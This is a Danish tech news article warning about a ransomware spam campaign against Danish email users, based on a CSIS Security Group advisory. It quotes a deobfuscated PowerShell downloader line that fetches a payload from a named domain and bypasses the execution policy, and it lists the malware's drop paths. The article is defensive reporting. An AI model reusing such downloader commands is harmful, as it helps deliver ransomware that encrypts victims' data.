Modtager du en mail, der ligner ovenstående billede, bør du slette beskeden med det samme. Skærmdump: CSIS Security Group.

Sikkerhedsfirma advarer: Målrettet ransomware-kampagne skyller ind over Danmark

En spambølge målrettet danske mail-modtager skyller ind over landet med filer, der kan hente ransomware på modtagerens computer. Læs her, hvad du skal passe på.

Det danske sikkerhedsselskab CSIS Security Group har flere timer torsdag i denne uge registreret en vedvarende, massiv spambølge rettet specifikt mod danske e-mailadresser.

Spambølgen kommer med et vedhæftet zip-arkiv, der kan gøre stor skade på modtagerens computer.

Skaden sker, hvis mail-modtageren åbner og aktiverer det vedhæftede zip-arkiv, der via Windows' PowerShell-framework vil hente ransomware iTorrentlocker-klassen, oplyser CSIS Security Group.

Sikkerhedsselskabet forklarer, at ransomwaren hentes fra to specifikke domæner, hvorfra der sendes inficeret JavaScript.

"Powershell koden ser ud som følgende i deobfuskeret form: DownloadFile(''http://nathanaylett.com/syst.vcx'',$path) Set-ExecutionPolicy Bypass -Scope Process; $path=($env:t+$mqedu+yzahe.exe'')." skriver CSIS Security Group i sin sikkerhedsadvarsel.

Sådan forløber angrebet
I CSIS Security Groups interne mail-beskyttelsesprogram er sikkerhedsniveauet hævet til 4 på en skala, hvor 5 er det højeste.

Sikkerhedsselskabet forklarer, at hvis ransomwaren får adgang til mail-modtagerens computer, vil koden kopiere sig på følgende lokationer:

C:\Users\[%brugerkonto%]\AppData\Local\Temp\985611.jse
C:\Users\[%brugerkonto%]\AppData\Local\Temp\ysyne.exe

"Den pågældende ransomware vil dernæst i vanlig stil begynde at kryptere data lokalt og på alle tilgængelige netværksdrev," lyder advarslen.

Derfor bør alle være ekstra opmærksomme, når de modtager mails med vedhæftede filer, obskure links og beskeder fra ukendte adresser.

Læs også:
Ransomware as a service boomer: Så nemt kan menigmand angribe dig med ransomware

Alvorlig afsløring: Halvdelen af alle ransomware-ofre ender med at betale løsepenge


Ytringer på debatten er afsenders eget ansvar - læs debatreglerne
Indlæser debat...


Brancheguiden
Brancheguide logo
Opdateres dagligt:
Den største og
mest komplette
oversigt
over danske
it-virksomheder
Hvad kan de? Hvor store er de? Hvor bor de?
Computerworld A/S
Salg af telemarketing og research for it-branchen, it-kurser og konferencer

Nøgletal og mere info om virksomheden
Skal din virksomhed med i Guiden? Klik her

Kommende events
Få styr på det rigtige setup: Skal du vælge on prem eller cloud? Eller en kombination?

Mange virksomheder har i årevis opbevaret og håndteret deres data i egne datacentre, men med cloud computing er tingene for alvor i opbrud. På dette event bliver du klogere på de muligheder, som du har for at designe en hybrid cloud-infrastruktur, der kombinerer on-premise og forskellige cloud-former på bedst mulig måde for netop din forretning.

26. februar 2019 | Læs mere


Predictive business analytics - Brug AI og Machine learning til at forstå og forudsige dine kunders adfærd

Machine Learning og kunstig intelligens er ikke længere bare hype. Det er et værktøj, der for eksempel kan hjælpe dig med at give dine kunder individualiserede og relevante tilbud – og dermed øge både salg og kundetilfredshed. Data om dine kunder og deres adfærd er en uundværlig ressource i salgsarbejdet. Uden indsigt og kendskab til kunderne, er det en hovedløs jagt at skabe mersalg og styrke kundeloyaliteten. Machine Learning hjælper dig og dit salgspersonale med at bruge alle disse data og med meget stor sikkerhed at forudsige kundens næste køb.

27. februar 2019 | Læs mere


Få styr på det rigtige setup: Skal du vælge on prem eller cloud? Eller en kombination?

Mange virksomheder har i årevis opbevaret og håndteret deres data i egne datacentre, men med cloud computing er tingene for alvor i opbrud. På dette event bliver du klogere på de muligheder, som du har for at designe en hybrid cloud-infrastruktur, der kombinerer on-premise og forskellige cloud-former på bedst mulig måde for netop din forretning.

28. februar 2019 | Læs mere






Premium
Lynhurtige fiberforbindelser fra TDC er på vej til titusindvis af danskere: Disse steder i Danmark er mest interessante
Interview: Det ville være fantastisk, hvis vi kan få udrullet fiber til mere end 50.000 husstande i 2019, lyder det fra TDC's finansdirektør Stig Pastwa. Han forklarer, at TDC har kig på helt bestemte dele af danmarkskortet.
Computerworld
SSD-priserne kollapser: De lynhurtige drev koster under det halve af, hvad de gjorde i 2018
Efter en periode med prisstigninger, falder priserne på de hurtige SSD-drev nu hastigt.
CIO
Tech fra Toppen: Det har CIO Mads Madsbjerg Hansen fra FLSmidth lært af flere års global it-konsolidering
Tech fra Toppen: Flere års arbejde har betydet en reduktion i antallet af it-systemer hos FLSmidth. Men processen har ikke været uden overraskelser. Hør hvad CIO Mads Madsbjerg Hansen har lært af den omfattende og globale proces.
Job & Karriere
Toke Kruse: Jeg spår, at humankapital i 2019 erstattes af it-kapital
I 2019 vil vi se en kæmpe udskiftning af ressourcer, hvorunder de menneskelige processer overtages af software, der gør os mennesker hurtigere og mere effektive. Betyder det store fyringsrunder? Måske.
White paper
Kvartalsrapport på cyber-trusselslandskabet
I denne rapport dykker vi ned i cyber-trusselsbilledet for Q4. Vi har opsummeret statistikkerne fra millioner af trusselsforekomster observeret af Fortinet enheder i live produktionsmiljøer i hele verden. Ifølge IDC er Fortinet den mest adapterede netværks-sikkerhedsløsning, med 4,2 mio. implementerede devices. Det giver et unikt perspektiv på trusselslandskabet, som er destilleret ned i denne rapport. Download den her og få det fulde overblik.